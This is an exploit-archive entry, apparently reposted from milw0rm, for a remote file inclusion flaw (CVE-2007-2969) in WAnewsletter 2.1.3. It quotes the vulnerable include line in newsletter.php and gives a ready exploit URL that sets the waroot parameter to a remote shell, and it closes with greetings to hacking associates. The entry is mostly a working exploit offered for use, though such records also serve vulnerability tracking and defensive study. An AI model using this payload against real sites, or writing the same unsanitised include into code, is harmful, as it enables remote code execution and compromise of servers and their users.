wanewsletter 2.1.3 - Remote File Inclusion



EKU-ID: 11963 CVE: OSVDB-38812;CVE-2007-2969 OSVDB-ID:
Author: Mogatil Published: 2007-05-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


======================= S==A==U==D==I ========================

WAnewsletter-2.1.3 (newsletter.php) RFI Vul

==============================================================

Found By : Mogatil , jjl@hotmail.com

==============================================================

Script Site : http://script.emanual.ru/get?i=1053

==============================================================
File : /newsletter.php


require_once($waroot . 'start.php');

==============================================================

Thanx: cold zero . gawey Al Azary . crazy man . scorbion_22 .
the_muslim_sniper

==============================================================

Exploit :[Path]/newsletter/newsletter.php?waroot=shell

==============================================================

# milw0rm.com [2007-05-28]